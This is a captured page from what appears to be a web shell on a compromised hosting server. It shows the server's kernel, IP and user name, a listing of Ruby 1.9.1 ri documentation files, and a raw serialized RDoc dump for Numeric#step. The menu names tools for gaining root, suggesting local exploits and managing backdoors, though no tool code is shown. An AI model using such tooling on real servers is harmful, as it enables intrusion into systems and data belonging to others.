Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
share /
ri /
1.9.1 /
system /
Numeric /
Delete
Unzip
Name
Size
Permission
Date
Action
%25-i.ri
437
B
-rw-r--r--
2023-07-26 17:26
%2b%40-i.ri
234
B
-rw-r--r--
2023-07-26 17:26
%2d%40-i.ri
248
B
-rw-r--r--
2023-07-26 17:26
%3c%3d%3e-i.ri
291
B
-rw-r--r--
2023-07-26 17:26
abs-i.ri
424
B
-rw-r--r--
2023-07-26 17:26
abs2-i.ri
224
B
-rw-r--r--
2023-07-26 17:26
angle-i.ri
311
B
-rw-r--r--
2023-07-26 17:26
arg-i.ri
307
B
-rw-r--r--
2023-07-26 17:26
cdesc-Numeric.ri
2.19
KB
-rw-r--r--
2023-07-26 17:26
ceil-i.ri
591
B
-rw-r--r--
2023-07-26 17:26
coerce-i.ri
808
B
-rw-r--r--
2023-07-26 17:26
conj-i.ri
243
B
-rw-r--r--
2023-07-26 17:26
conjugate-i.ri
253
B
-rw-r--r--
2023-07-26 17:26
denominator-i.ri
268
B
-rw-r--r--
2023-07-26 17:26
div-i.ri
573
B
-rw-r--r--
2023-07-26 17:26
divmod-i.ri
1.99
KB
-rw-r--r--
2023-07-26 17:26
eql%3f-i.ri
485
B
-rw-r--r--
2023-07-26 17:26
fdiv-i.ri
236
B
-rw-r--r--
2023-07-26 17:26
floor-i.ri
520
B
-rw-r--r--
2023-07-26 17:26
i-i.ri
286
B
-rw-r--r--
2023-07-26 17:26
imag-i.ri
237
B
-rw-r--r--
2023-07-26 17:26
imaginary-i.ri
247
B
-rw-r--r--
2023-07-26 17:26
integer%3f-i.ri
351
B
-rw-r--r--
2023-07-26 17:26
magnitude-i.ri
436
B
-rw-r--r--
2023-07-26 17:26
modulo-i.ri
447
B
-rw-r--r--
2023-07-26 17:26
nonzero%3f-i.ri
594
B
-rw-r--r--
2023-07-26 17:26
numerator-i.ri
242
B
-rw-r--r--
2023-07-26 17:26
phase-i.ri
311
B
-rw-r--r--
2023-07-26 17:26
polar-i.ri
242
B
-rw-r--r--
2023-07-26 17:26
quo-i.ri
279
B
-rw-r--r--
2023-07-26 17:26
real%3f-i.ri
314
B
-rw-r--r--
2023-07-26 17:26
real-i.ri
214
B
-rw-r--r--
2023-07-26 17:26
rect-i.ri
229
B
-rw-r--r--
2023-07-26 17:26
rectangular-i.ri
243
B
-rw-r--r--
2023-07-26 17:26
remainder-i.ri
336
B
-rw-r--r--
2023-07-26 17:26
round-i.ri
547
B
-rw-r--r--
2023-07-26 17:26
singleton_method_added-i.ri
319
B
-rw-r--r--
2023-07-26 17:26
step-i.ri
1.44
KB
-rw-r--r--
2023-07-26 17:26
to_c-i.ri
235
B
-rw-r--r--
2023-07-26 17:26
to_int-i.ri
303
B
-rw-r--r--
2023-07-26 17:26
truncate-i.ri
385
B
-rw-r--r--
2023-07-26 17:26
zero%3f-i.ri
270
B
-rw-r--r--
2023-07-26 17:26
Save
Rename
U:RDoc::AnyMethod[iI" step:ETI"Numeric#step;FF:publico:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"DInvokes <em>block</em> with the sequence of numbers starting at;TI"?<i>num</i>, incremented by <i>step</i> (default 1) on each;TI"Ecall. The loop finishes when the value to be passed to the block;TI"Fis greater than <i>limit</i> (if <i>step</i> is positive) or less;TI"?than <i>limit</i> (if <i>step</i> is negative). If all the;TI"?arguments are integers, the loop operates using an integer;TI"Ecounter. If any of the arguments are floating point numbers, all;TI"Care converted to floats, and the loop is executed <i>floor(n +;TI"3n*epsilon)+ 1</i> times, where <i>n = (limit -;TI"Bnum)/step</i>. Otherwise, the loop starts at <i>num</i>, uses;TI"Deither the <code><</code> or <code>></code> operator to compare;TI"Fthe counter against <i>limit</i>, and increments itself using the;TI"<code>+</code> operator.;To:RDoc::Markup::BlankLine o; ; [I"=If no block is given, an enumerator is returned instead.;T@o:RDoc::Markup::Verbatim; [I"(1.step(10, 2) { |i| print i, " " } ;FI"6Math::E.step(Math::PI, 0.2) { |f| print f, " " } ;Fo; ; [I"<em>produces:</em>;T@o;; [I"1 3 5 7 9 ;FI"72.71828182845905 2.91828182845905 3.11828182845905;F: @file0I"mnum.step(limit[, step]) {|i| block } -> self num.step(limit[, step]) -> an_enumerator ;T0[ I"(*args);FI"numeric.c;T